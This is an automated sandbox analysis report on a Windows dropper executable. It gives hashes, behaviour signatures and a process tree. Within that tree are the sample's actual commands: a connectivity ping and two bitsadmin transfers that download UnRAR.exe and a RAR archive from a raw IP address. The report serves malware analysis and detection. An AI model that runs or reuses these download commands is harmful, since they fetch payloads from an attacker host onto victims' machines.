Analysis
-
max time kernel
94s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2024 03:48
Static task
static1
Behavioral task
behavioral1
Sample
a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
General
-
Target
a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe
-
Size
42KB
-
MD5
56944be08ed3307c498123514956095b
-
SHA1
53ffb50051da62f2c2cee97fe048a1441e95a812
-
SHA256
a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181
-
SHA512
aa196a1a1e44c3fde974bbf8a031e6943a474d16d5a956b205d283ee5be53e110dba52817f7f2782e7ecc8783fea77f9c34613f99fb81fe09d2bea8b2f91bc13
-
SSDEEP
768:hef6qfEqLBTxrLkSRoys2uGUmRDcMznWHWmZCXrs0D3S9i1GcucbMgAoG:efHLrLkSRoybCQUZsrs0DC1cucbMDoG
Malware Config
Signatures
-
Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
bitsadmin.exebitsadmin.exepid Process 4820 bitsadmin.exe 1896 bitsadmin.exe -
Downloads MZ/PE file
-
Loads dropped DLL 3 IoCs
Processes:
a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exepid Process 3280 a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe 3280 a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe 3280 a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exeping.exebitsadmin.exebitsadmin.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ping.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exedescription pid Process procid_target PID 3280 wrote to memory of 1660 3280 a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe 82 PID 3280 wrote to memory of 1660 3280 a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe 82 PID 3280 wrote to memory of 1660 3280 a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe 82 PID 3280 wrote to memory of 4820 3280 a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe 84 PID 3280 wrote to memory of 4820 3280 a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe 84 PID 3280 wrote to memory of 4820 3280 a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe 84 PID 3280 wrote to memory of 1896 3280 a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe 94 PID 3280 wrote to memory of 1896 3280 a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe 94 PID 3280 wrote to memory of 1896 3280 a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe"C:\Users\Admin\AppData\Local\Temp\a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Windows\SysWOW64\ping.exeping -n 1 8.8.8.82⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1660
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"2⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:4820
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar"2⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:1896
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD511092c1d3fbb449a60695c44f9f3d183
SHA1b89d614755f2e943df4d510d87a7fc1a3bcf5a33
SHA2562cd3a2d4053954db1196e2526545c36dfc138c6de9b81f6264632f3132843c77
SHA512c182e0a1f0044b67b4b9fb66cef9c4955629f6811d98bbffa99225b03c43c33b1e85cacabb39f2c45ead81cd85e98b201d5f9da4ee0038423b1ad947270c134a